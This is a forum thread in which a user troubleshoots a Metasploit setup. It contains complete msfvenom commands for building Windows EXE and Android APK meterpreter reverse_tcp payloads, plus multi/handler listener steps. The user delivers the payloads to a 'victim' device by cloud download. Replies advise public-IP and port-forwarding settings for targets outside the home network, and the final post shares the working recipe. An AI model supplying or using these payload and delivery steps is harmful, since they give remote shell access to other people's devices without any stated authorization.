Forum Thread: Can't Get Metasploit Session.

Hello, i have little problem in Metasploit. I can't get metasploit session. Metasploit is still listening. So i will tell you what i am doing.

Step 1: Creating Executable

Before all i create executable with msfvenom. Command finally look like

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<MY IP> LPORT=4444 -f exe > file.exe

Then I upload file on cloud storage and download this file from the victim's computer.

Step 2: Starting Metasploit

I start metasploit normally with msfconsole command.
Then i just type use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <victim ip>
exploit
Handler failed to bind to <victim ip>:4444:- -
Started reverse TCP handler on 0.0.0.0:4444
Starting the payload handler. . .

Step 3: Run Exe File on Victim's Computer

Then i go to the victim's computer and i run file.exe
Still no change. Still starting payload handler.
I left it for 30 minutes and nothing.
Is it because of my computer is running on windows 10? or because victim have firewall?
I turned off the firewall and antivirus on my computer.

12 Responses

When you set your lhost that is going to be your IP, and whe you set your lport that is going to be the port that you set up within your payload. Usually when you get an error saying that it failed to bind it means that you either using the wrong IP or the port that you're trying to bind to is already in use.

I scanned ports and port 4444 is free. And about IP, in msfvenom i used my IP...in set lhost i used victim ip. And about port, everytime i use 4444. We are on same network (my machine and victim's machine)

Lhost is always the local IP address of your computer your using to hack with. Ex 192.168.1.101 for your listener. Lhost for payloads on WAN would be your public IP.

Target IP would be the Rhost and is not needed for the listener.

So if i understand, LHOST is my computer's IP address? in msfvenom command and even in metasploit when i am setting a payload (set PAYLOAD <my ip>)?

If target computer is on your local network, meaning another computer on your wifi router, both your listener and your payload Lhost will be your local IP address. If your target computer is outside your network, friends house, your Lhost in your payload will be your WAN public IP address, and your listener will still be your local IP address.

Everything you say is ok, except your/victim IP. LHOST=your ip
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<MY IP> LPORT=4444 -f exe > file.exe

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <MY IP> ------ must be the same IP(your) as in payload(msfvenom)
set LPORT 4444
exploit

Thanks, now error "Handler failed to bind to <ip>:4444" is gone, but still not getting any sessions. I exploited first and then started exe file on victim's computer. Is it OK?

It must be blocked by something..but what? I have antivirus, including firewall turned off. But victim have firewall turned on.

It's OK.
It should work if you doing everything right.
You know that you need to run file AFTER you type exploit?
Maybe a screenshot would help.

Yes that's what i said. I run exploit first and then i start exe file on victim's computer. And here is screenshot of metasploit console: CLICK ME

Your handler appears to be set up correctly.
So now is your victims computer on the same network? If not, is port 4444 port forwarded in your router?

I don't know. I don't have any special antivirus or something else. Just Defender and Firewall, both turned off. Only victim have turned on firewall and defender. Is this cause of my problem? I tried to exploit my own phone, on android. No success, still listening.

EDIT: I am going to reinstall metasploit. Maybe i'll get some luck. It may be the cause of my problem, because in the past, Windows Defender moved some files to quarantine. I've moved these files back, but i don't know, maybe Defender deleted some files.

REPLY: Yes, we are on the same network.

Hello guys, i solved the problem and i want to share my solution with others.
So what did i do?
Just reinstalled Metasploit and used different port.

Step 1: Created Msfvenom App with Command

msfvenom -p android/meterpreter/reverse_tcp LHOST=<my ip> LPORT=5555 R > pentest.apk

And then basic steps-
msfconsole
use multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST <my ip>
set LPORT 5555
exploit

Step 2: Installed and Opened Apk on Victim's Android Device (Or Windows Device)

And that's all. I think it's because of port 4444, maybe this port was used by something else, so i used port 5555 and it worked. Thanks everyone who tried to help. Maybe this will help someone.

Share Your Thoughts

  • Hot
  • Active